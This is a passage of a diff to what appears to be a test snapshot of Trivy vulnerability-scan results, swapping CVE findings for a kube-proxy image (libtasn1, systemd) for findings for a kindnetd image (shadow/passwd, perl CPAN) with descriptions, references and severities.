"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5707-1", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-1000654", - "installedVersion": "4.13-3", - "packageName": "libtasn1-6", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html", - "http://www.securityfocus.com/bid/105151", - "https://access.redhat.com/security/cve/CVE-2018-1000654", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000654", - "https://gitlab.com/gnutls/libtasn1/issues/4", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654", - "https://ubuntu.com/security/notices/USN-5352-1", - "https://www.cve.org/CVERecord?id=CVE-2018-1000654", + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", ], }, "category": "Vulnerability", - "description": "GNU Libtasn1-4.13 libtasn1-4.13 version libtasn1-4.13, libtasn1-4.12 contains a DoS, specifically CPU usage will reach 100% when running asn1Paser against the POC due to an issue in _asn1_expand_object_id(p_tree), after a long time, the program will be killed. This attack appears to be exploitable via parsing a crafted file.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libtasn1: Infinite loop in _asn1_expand_object_id(ptree) leads to memory exhaustion", + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-1000654", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/105151", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-1000654", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000654", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/issues/4", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5352-1", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-1000654", + "value": "https://issues.rpath.com/browse/RPL-1825", }, ], "severity": "LOW", @@ -166457,2121 +166206,2121 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-3843", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", "references": [ - "http://www.securityfocus.com/bid/108116", - "https://access.redhat.com/security/cve/CVE-2019-3843", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", - "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", - "https://linux.oracle.com/cve/CVE-2019-3843.html", - "https://linux.oracle.com/errata/ELSA-2020-1794.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", - "https://security.netapp.com/advisory/ntap-20190619-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-3843", + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", ], }, "category": "Vulnerability", - "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: services with DynamicUser can create SUID/SGID binaries", + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-3843", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/108116", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-3843", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-3843.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://ubuntu.com/security/notices/USN-5745-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-3843", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-3844", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", "references": [ - "http://www.securityfocus.com/bid/108096", - "https://access.redhat.com/security/cve/CVE-2019-3844", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", - "https://linux.oracle.com/cve/CVE-2019-3844.html", - "https://linux.oracle.com/errata/ELSA-2020-1794.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", - "https://security.netapp.com/advisory/ntap-20190619-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-3844", + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", ], }, "category": "Vulnerability", - "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: services with DynamicUser can get new privileges and create SGID binaries", + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-3844", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/108096", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-3844", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-3844.html", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + ], + }, + "category": "Vulnerability", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "Improper input validation in shadow-utils package utility chfn", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-3844", + "value": "https://github.com/shadow-maint/shadow/pull/687", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + }, + { + "type": "URL", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + }, + { + "type": "URL", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "241-7~deb10u9", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-26604", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-16156", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-26604", - "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", - "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", - "https://github.com/systemd/systemd/issues/5666", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", - "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", - "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", - "https://security.netapp.com/advisory/ntap-20230505-0009/", - "https://www.cve.org/CVERecord?id=CVE-2023-26604", + "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", + "https://access.redhat.com/security/cve/CVE-2020-16156", + "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "https://ubuntu.com/security/notices/USN-5689-1", + "https://ubuntu.com/security/notices/USN-5689-2", + "https://www.cve.org/CVERecord?id=CVE-2020-16156", ], }, "category": "Vulnerability", - "description": "systemd before 247 does not adequately block local privilege escalation for some Sudo configurations, e.g., plausible sudoers files in which the "systemctl status" command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This presents a substantial security risk when running systemctl from Sudo, because less executes as root when the terminal size is too small to show the complete systemctl output.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "CPAN 2.28 allows Signature Verification Bypass.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "privilege escalation via the less pager", + "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-26604", + "value": "https://avd.aquasec.com/nvd/cve-2020-16156", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-26604", + "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", }, { "type": "URL", - "value": "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", + "value": "https://access.redhat.com/security/cve/CVE-2020-16156", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", + "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/5666", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", }, { "type": "URL", - "value": "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", + "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230505-0009/", + "value": "https://ubuntu.com/security/notices/USN-5689-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-26604", + "value": "https://ubuntu.com/security/notices/USN-5689-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "241-7~deb10u8", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33910", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31484", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", - "https://access.redhat.com/security/cve/CVE-2021-33910", - "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", - "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", - "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", - "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", - "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", - "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", - "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", - "https://linux.oracle.com/cve/CVE-2021-33910.html", - "https://linux.oracle.com/errata/ELSA-2021-2717.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20211104-0008/", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2021-33910", - "https://www.debian.org/security/2021/dsa-4942", - "https://www.openwall.com/lists/oss-security/2021/07/20/2", - "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "https://github.com/andk/cpanpm/pull/175", + "https://metacpan.org/dist/CPAN/changes", + "https://ubuntu.com/security/notices/USN-6112-1", + "https://ubuntu.com/security/notices/USN-6112-2", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", ], }, "category": "Vulnerability", - "description": "basic/unit-name.c in systemd prior to 246.15, 247.8, 248.5, and 249.1 has a Memory Allocation with an Excessive Size Value (involving strdupa and alloca for a pathname controlled by a local attacker) that results in an operating system crash.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash", + "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33910", + "value": "https://avd.aquasec.com/nvd/cve-2023-31484", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33910", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", + "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", + "value": "https://github.com/andk/cpanpm/pull/175", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", + "value": "https://metacpan.org/dist/CPAN/changes", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", + "value": "https://ubuntu.com/security/notices/USN-6112-1", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", + "value": "https://ubuntu.com/security/notices/USN-6112-2", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-4116", + "installedVersion": 